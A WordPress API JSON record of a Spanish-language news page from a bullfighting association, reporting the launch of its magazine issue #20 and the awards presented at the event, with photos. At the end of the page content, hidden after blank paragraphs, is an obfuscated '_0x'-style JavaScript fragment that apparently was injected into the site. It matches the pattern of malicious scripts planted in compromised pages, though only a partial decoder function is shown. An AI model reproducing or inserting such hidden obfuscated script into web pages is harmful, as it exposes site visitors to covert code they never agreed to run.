{"id":205,"date":"2022-12-21T19:37:39","date_gmt":"2022-12-21T19:37:39","guid":{"rendered":"https:\/\/astauros.com.co\/?page_id=205"},"modified":"2022-12-21T20:22:26","modified_gmt":"2022-12-21T20:22:26","slug":"lanzamiento-revista-20","status":"publish","type":"page","link":"https:\/\/astauros.com.co\/index.php\/lanzamiento-revista-20\/","title":{"rendered":"LANZAMIENTO REVISTA #20"},"content":{"rendered":"<p><img fetchpriority=\"high\" decoding=\"async\" class=\" wp-image-203 aligncenter\" src=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/Revista-astauros-CARATULA-2022--300x190.jpg\" alt=\"\" width=\"316\" height=\"200\" srcset=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/Revista-astauros-CARATULA-2022--300x190.jpg 300w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/Revista-astauros-CARATULA-2022--1024x648.jpg 1024w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/Revista-astauros-CARATULA-2022--768x486.jpg 768w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/Revista-astauros-CARATULA-2022--1536x972.jpg 1536w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/Revista-astauros-CARATULA-2022--2048x1296.jpg 2048w\" sizes=\"(max-width: 316px) 100vw, 316px\" \/><\/p>\n<p>En el sal\u00f3n \u00abCa\u00f1averalejo\u00bb de la plaza de toros, este martes 20 de diciembre se realiz\u00f3 el lanzamiento de la revista ASTAUROS #20, se hizo entrega de los reconocimientos a Taurino del a\u00f1o y toda una vida y s entreg\u00f3 el premio a mejor subalterno de la pasada temporada.<\/p>\n<p>Fueron distinguidos:<\/p>\n<p>Cristhian Garc\u00e9s Aljure como Taurino del a\u00f1o por Su f\u00e9rrea defensa de la Tauromaquia en el congreso de la Rep\u00fablica.<\/p>\n<p>El Matador Gitanillo de Am\u00e9rica recibi\u00f3 la menci\u00f3n \u00abA toda Una Vida\u00bb en reconocimiento a Su exitosa carrera y la valiente postura y dedicaci\u00f3n para luchar por la Tradici\u00f3n y Cultura Taurina.<\/p>\n<p>El Torero de plata Carlos Rodriguez \u00abGarrido\u00bb recibi\u00f3 el premio concedido por la Asociaci\u00f3n a mejor subalterno de la temporada 2021.<\/p>\n<p><img decoding=\"async\" class=\"size-medium wp-image-228 aligncenter\" src=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6232-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6232-300x225.jpg 300w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6232-1024x768.jpg 1024w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6232-768x576.jpg 768w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6232-678x509.jpg 678w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6232-326x245.jpg 326w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6232-80x60.jpg 80w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6232.jpg 1280w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Los homenajeados recibieron cada uno una escultura aut\u00e9ntica hecha por el Maestro Andr\u00e9s Baz\u00e1n.<\/p>\n<p><img decoding=\"async\" class=\"size-medium wp-image-217 aligncenter\" src=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6187-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6187-300x225.jpg 300w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6187-1024x768.jpg 1024w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6187-768x576.jpg 768w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6187-678x509.jpg 678w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6187-326x245.jpg 326w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6187-80x60.jpg 80w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6187.jpg 1280w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Se di\u00f3 inicio a la velada con las palabras del Presidente de la Asociaci\u00f3n Sr. Jorge H. Z\u00fa\u00f1iga.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-207 aligncenter\" src=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6201-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6201-225x300.jpg 225w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6201-768x1024.jpg 768w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6201.jpg 960w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/p>\n<p>El Dr. Humberto Botero Jaramillo hizo entrega del reconocimiento a toda una vida al matador Gitanillo de Am\u00e9rica.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-208 aligncenter\" src=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6209-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6209-225x300.jpg 225w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6209-768x1024.jpg 768w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6209.jpg 960w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/p>\n<p>El Matador agradeci\u00f3 el gesto con una emotivas palabras donde expres\u00f3 su optimismo en que no triunfar\u00e1 la prohibici\u00f3n, pidi\u00f3 Rodear al Representante Cristhian Garc\u00e9s en su labor legislativa y cit\u00f3 un erudito texto del Expresidente Guillermo Valencia sobre los Toros y La pol\u00edtica.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-212 aligncenter\" src=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6211-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6211-225x300.jpg 225w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6211-768x1024.jpg 768w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6211.jpg 960w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/p>\n<p>De manos de Jorge H, Z\u00fa\u00f1iga, El Congresista Cristhian Garc\u00e9s recibi\u00f3 el galard\u00f3n de \u00abTaurino del A\u00f1o\u00bb, Quien luego se dirigi\u00f3 a los asistentes reafirmando Su compromiso en luchar por las libertades y en contra de la prohibici\u00f3n de las practicas Taurinas.\u00a0 \u00a0Tambi\u00e9n esboz\u00f3 lo que ser\u00e1 ese arduo trabajo desde el congreso e invit\u00f3 a todos los Taurinos a participar por todos los medios en la defensa de la Tauromaquia.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-214 aligncenter\" src=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6216-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6216-225x300.jpg 225w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6216-768x1024.jpg 768w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6216.jpg 960w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-215 aligncenter\" src=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6220-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6220-225x300.jpg 225w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6220-768x1024.jpg 768w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6220.jpg 960w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/p>\n<p>Eduardo Manrique (Vicepresidente de Astauros), entrg\u00e9 el premio de mejor subalterno en la temporada 2021 al banderillero Carlos Rodriguez \u00abGarrido\u00bb, Qui\u00e9n Agradeci\u00f3 con sentidas palabras este merecido homenaje.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-216 aligncenter\" src=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6226-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" srcset=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6226-225x300.jpg 225w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6226-768x1024.jpg 768w, https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/thumbnail_IMG_6226.jpg 960w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>En el sal\u00f3n \u00abCa\u00f1averalejo\u00bb de la plaza de toros, este martes 20 de diciembre se realiz\u00f3 el lanzamiento de la revista ASTAUROS #20, se hizo <a class=\"mh-excerpt-more\" href=\"https:\/\/astauros.com.co\/index.php\/lanzamiento-revista-20\/\" title=\"LANZAMIENTO REVISTA #20\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-205","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages\/205","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/comments?post=205"}],"version-history":[{"count":5,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages\/205\/revisions"}],"predecessor-version":[{"id":229,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages\/205\/revisions\/229"}],"wp:attachment":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/media?parent=205"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}